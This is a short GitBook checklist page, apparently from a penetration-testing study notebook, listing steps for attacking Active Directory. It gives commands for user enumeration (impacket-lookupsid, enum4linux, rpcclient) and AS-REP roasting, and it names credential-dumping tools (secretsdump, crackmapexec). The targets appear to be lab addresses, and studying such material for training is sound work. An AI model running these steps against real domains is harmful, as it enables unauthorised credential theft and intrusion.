Passion
  • What is this GitBook about ?
  • Privilege Escalation
    • Linux
    • Windows
  • Network Security
    • Port Scanning
    • DNS Enumeration
    • FTP Enumeration
    • SSH Enumeration
    • SMB Enumeration
    • SMTP Enumeration
    • POP3 Enumeration
  • Checklists
    • Active Directory Security
    • OS Command Injection
    • Buffer Overflow
    • Broken Access Control
    • Local File Inclusion
    • SSRF
    • XXE Attacks
    • SQL Injection
    • XSS
  • WebApp Security
    • Local File Inclusion
    • File Upload Attacks
      • IIS Server File Upload
      • Escaping Sandbox via File Upload
    • Broken Access Control
      • Vertical PrivEsc
      • Horizontal PrivEsc
      • Horizontal => Vertical
    • OS Command Injection
    • SSTI
      • Finding the Injection Point
      • Indentification
      • Exploitation
    • XXE Attacks
      • XXE to LFI
      • XXE to SSRF
      • XXE via File upload
      • XInclude Attacks
      • Blind XXE Attacks
        • Identification
        • Exploitation
        • Blind XXE to LFI
        • Blind XXE by defining Local DTD
    • SQL Injection
    • Server Side Request Forgery
      • Various Attack Methods
      • Exploiting Blind SSRF
    • OAuth Attacks
      • In Password-Based Logins
    • XSS
      • Reflected XSS
      • Stored XSS
      • DOM XSS
      • Blind XSS
      • Perfecting our Payload
      • Exploiting Blind XSS
  • WebApp Mitigations
    • SSTI
  • Docker Security
    • Configuration
    • Ngnix Deployment
  • ☁️Cloud Security
    • AWS
      • Cloud Breach S3
      • IAM PrivEsc - RollBack
      • IAM PrivEsc - Attachment
Powered by GitBook
On this page
  • Enumerating the Usernames first !
  • AS-REP Roasting
  • After Having Creds
  1. Checklists

Active Directory Security

PRACTICE ! PRACTICE ! PRACTICE !

PreviousPOP3 EnumerationNextOS Command Injection

Last updated 1 year ago

Enumerating the Usernames first !

If anonymous user has READ permissions over the $IPC share, then 

$ impacket-lookupsid anonymous@10.10.117.62 | tee users.txt

Meanwhile, run the enum4linux in the background

$ enum4linux -a 10.10.10.x | tee enum4linux.log

If rpcclient has anonymous login then

rpcclient $> enumdomusers
rpcclient $> enumdomgroups

AS-REP Roasting

After finding valid usernames, try to check if there is any way to AS-REP roast 

$ impacket-GetNPUsers spooky.local/ -no-pass -usersfile users.txt -dc-ip <target ip>

After Having Creds

  • Enumerate Shares with those creds - cme

  • Try dumping the secrets with it - impacket-secretsdump

  • Try dumping the sam and lass - crackmapexec

  • Check for winrm, smb and other services till it gets Pwn3d

The last GO-TO option !